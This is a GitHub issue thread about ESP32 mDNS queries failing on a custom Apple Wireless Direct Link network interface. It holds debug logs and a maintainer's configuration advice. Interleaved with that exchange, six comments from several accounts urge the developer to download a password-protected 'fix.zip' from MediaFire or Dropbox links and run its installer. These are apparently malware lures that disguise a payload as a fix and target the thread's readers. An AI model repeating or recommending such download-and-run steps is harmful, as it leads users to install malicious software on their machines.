espressif/esp-protocols #641: mdns query with custom netif

archef2000, 2024-08-25:
### Answers checklist.

- [X] I have read the documentation for esp-protocols [components](https://github.com/espressif/esp-protocols#readme) and the issue is not addressed there.
- [X] I have updated my esp-protocols branch (master or release) to the latest version and checked that the issue is present there.
- [X] I have searched the issue tracker for a similar issue and not found a similar issue.

### General issue report

I have created a custom esp netif for Apple wireless direct link. [Implementation here](https://github.com/archef2000/esp-owl)
Now I am trying to query for the airdrop service of other iPhones.

After I init the netif and registerd it with mdns i query for airdrop here:
[/main/wifi/capture.c#L233](https://github.com/archef2000/esp-owl/blob/main/main/wifi/capture.c#L233)

But It does not send any udp packet to the custom inetif and also does not find any records.

What are all the required steps for a netif to be seen ready, valid and etc for mdns to send query packets?

<details>
  <summary>Log</summary>

```js

E (21156) awdl: mdns_query_task
I (21156) custom_netif_example: Query PTR: _airdrop._tcp.local
I (21156) _mdns_send_search_action: queue send
I (21156) _mdns_execute_action: 3
I (21256) _mdns_send_search_action: queue send
I (21256) _mdns_execute_action: 4
I (21256) _mdns_search_send_pcb: mdns_is_netif_ready 0
I (21256) _mdns_search_send_pcb: mdns_is_netif_ready 0
I (21266) _mdns_search_send_pcb: mdns_is_netif_ready 0
I (21266) _mdns_search_send_pcb: mdns_is_netif_ready 0
I (21276) _mdns_search_send_pcb: mdns_is_netif_ready 0
I (21276) _mdns_search_send_pcb: mdns_is_netif_ready 0
D (21466) lwip: etharp_timer

D (21466) lwip: dhcp_coarse_tmr()

I (22356) _mdns_send_search_action: queue send
I (22356) _mdns_execute_action: 4
I (22356) _mdns_search_send_pcb: mdns_is_netif_ready 0
I (22356) _mdns_search_send_pcb: mdns_is_netif_ready 0
I (22366) _mdns_search_send_pcb: mdns_is_netif_ready 0
I (22366) _mdns_search_send_pcb: mdns_is_netif_ready 0
I (22376) _mdns_search_send_pcb: mdns_is_netif_ready 0
I (22376) _mdns_search_send_pcb: mdns_is_netif_ready 0
D (22466) lwip: etharp_timer

D (22466) lwip: dhcp_coarse_tmr()

I (23456) _mdns_send_search_action: queue send
I (23456) _mdns_execute_action: 4
I (23456) _mdns_search_send_pcb: mdns_is_netif_ready 0
I (23456) _mdns_search_send_pcb: mdns_is_netif_ready 0
D (23466) lwip: etharp_timer

I (23466) _mdns_search_send_pcb: mdns_is_netif_ready 0
D (23466) lwip: dhcp_coarse_tmr()

I (23476) _mdns_search_send_pcb: mdns_is_netif_ready 0
I (23486) _mdns_search_send_pcb: mdns_is_netif_ready 0
I (23486) _mdns_search_send_pcb: mdns_is_netif_ready 0
I (24256) _mdns_send_search_action: queue send
I (24256) _mdns_execute_action: 5
W (24256) custom_netif_example: No results found!
D (24466) lwip: etharp_timer

D (24466) lwip: dhcp_coarse_tmr()

E (25256) awdl: mdns_query_task
I (25256) custom_netif_example: Query PTR: _airdrop._tcp.local
I (25256) _mdns_send_search_action: queue send
I (25256) _mdns_execute_action: 3
I (25356) _mdns_send_search_action: queue send
I (25356) _mdns_execute_action: 4
I (25356) _mdns_search_send_pcb: mdns_is_netif_ready 0
I (25356) _mdns_search_send_pcb: mdns_is_netif_ready 0
I (25366) _mdns_search_send_pcb: mdns_is_netif_ready 0
I (25366) _mdns_search_send_pcb: mdns_is_netif_ready 0
I (25376) _mdns_search_send_pcb: mdns_is_netif_ready 0
I (25376) _mdns_search_send_pcb: mdns_is_netif_ready 0

```
</details>

Dev-Victor-Rodrigues, 2024-08-26:
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

Dev-Victor-Rodrigues, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

david-cermak, 2024-08-26:
Hi @archef2000 

You'd have to register the interface and enable it for specific IP protocols v4, v6 or both:

https://github.com/espressif/esp-protocols/blob/73c48307a367565f69e724df8641f8cbac45251d/components/mdns/examples/query_advertise/main/mdns_example_main.c#L326-L334

If you're also advertizing, you'd also need to send announcements:

https://github.com/espressif/esp-protocols/blob/73c48307a367565f69e724df8641f8cbac45251d/components/mdns/examples/query_advertise/main/mdns_example_main.c#L335

(not necessary if you're just querying)

archef2000, 2024-08-26:
Thanks for the quick answer when running the code (Added on line 335 in capture.c) I get the following error when adding the events for IP6 & IP4: 103 ESP_ERR_INVALID_STATE

toufiksalhi, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

toufiksalhi, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

jia6214876, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

ESMELSTEPHANE24, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

david-cermak, 2024-08-27:
What's the number of configured interfaces in mdns Kconifg?
```
CONFIG_MDNS_MAX_INTERFACES
```
This is 3 by default, but also 3 predefined interfaces are enabled, so there's probably no space for a another one by default.
you can either increase the `CONFIG_MDNS_MAX_INTERFACES` or disable one of the predefined
(or disable everything if you just need the mdns for the `lowpan6_ble_netif`)

archef2000, 2024-08-27:
Oh thanks I disabled the default interfaces to solve the invalid state error. Here is the new log where after 2-3 Query attempts it stops to send out packets and lwip is just doing some minimal packet handeling after that.

<details>
  <summary>Log</summary>

```js

I (606) aw�l: mac: 80:65:99:c7:ae:98
I (606) awdl core: switch channel to 6 (slot 0)
psf�time� int�rval us: 112640
E (616) wifi:failed to post WiFi eve�t=40 ret=259
� (626) awdl: (aw�l_cr�ate) creati�g awdl driver
aw�l_post_attach
a�dl_n�tif_init
E (636) awdl: mdns_query_task�igmp_joingroup_netif: attempt to join on non-IGMP netif
I (646) main_task: Returned from app_main()
D (646) lwip: pbuf_alloc(length=32)

D (646) lwip: pbuf_alloc(length=32) == 0x3fca4034

D (656) lwip: pbuf_remove_header: old 0x3fca407c new 0x3fca4084 (8)

D (656) lwip: pbuf_add_header: old 0x3fca4084 new 0x3fca407c (8)

D (666) lwip: pbuf_add_header: old 0x3fca407c new 0x3fca4054 (40)

D (666) lwip: ip6_output_if: ow1

D (676) lwip: IPv6 header:

D (676) lwip: +-------------------------------+

D (676) lwip: |  6 |    0  |            0     | (ver, class, flow)

D (686) lwip: +-------------------------------+

D (696) lwip: |        32     |    0  |    1  | (plen, nexth, hopl)

D (696) lwip: +-------------------------------+

D (706) lwip: |     0 |     0 |     0 |     0 | (src)

D (706) lwip: |     0 |     0 |     0 |     0 |

D (716) lwip: +-------------------------------+

D (716) lwip: |  ff02 |     0 |     0 |     0 | (dest)

D (726) lwip: |     0 |     0 |     0 |    fb |

D (726) lwip: +-------------------------------+

D (726) lwip: netif->output_ip6()

awdl_output ->linkoutput; q->len=72
60 00 00 00 00 20 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 02 00 00 00 00 00 00 00 00 00 00 00 00 00 fb 3a 00 05 02 00 00 01 00 83 00 7c b1 00 00 00 00 ff 02 00 00 00 00 00 00 00 00 00 00 00 00 00 fb
awdl_netif_linkoutput -> esp_netif_transmit -> driver->transmit (awdl_transmit)
awdl_transmit
60 00 00 00 00 20 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 02 00 00 00 00 00 00 00 00 00 00 00 00 00 fb 3a 00 05 02 00 00 01 00 83 00 7c b1 00 00 00 00 ff 02 00 00 00 00 00 00 00 00 00 00 00 00 00 fb
D (776) lwip: pbuf_free(0x3fca4034)

D (786) lwip: pbuf_free: deallocating 0x3fca4034

D (786) lwip: udp_bind(ipaddr =
D (796) lwip: 0.0.0.0
D (796) lwip: , port = 5353)

D (796) lwip: udp_bind: bound to
D (796) lwip: 0.0.0.0
D (806) lwip: , port 5353)
[... 446 lines cut ...]

D (18246) lwip: pbuf_free: deallocating 0x3fca4170

D (18466) lwip: etharp_timer

D (18466) lwip: dhcp_coarse_tmr()

TX[0][1]: To: ff02:0000:0000:0000:0000:0000:0000:00fb:5353, Packet[18890]:
    Q: *U* ._airdrop._tcp.local. PTR IN
D (19336) lwip: pbuf_alloc(length=37)

D (19336) lwip: pbuf_alloc(length=37) == 0x3fca4180

D (19336) lwip: pbuf_free(0x3fca4180)

D (19346) lwip: pbuf_free: deallocating 0x3fca4180

D (19466) lwip: etharp_timer

D (19466) lwip: dhcp_coarse_tmr()

W (20136) custom_netif_example: No results found!

```
</details>

david-cermak, 2024-09-09:
@archef2000 How exactly does your netif handle multicasts? I saw that you enabled [NETIF_FLAG_MLD6](https://github.com/archef2000/esp-owl/blob/923800ce04a96955956e5477b9945c76a06838aa/main/wifi/capture.c#L326C1-L327C1) directly in lwip.

Is this lwip issue https://github.com/espressif/esp-lwip/issues/72 related? I would guess some memory corruption is taking place in your netif while processing multicast packets.

david-cermak, 2025-01-10:
Any update? I think the multicasts are not handled correctly in the netif layers, thus closing the issue.
Feel free to reopen with more details.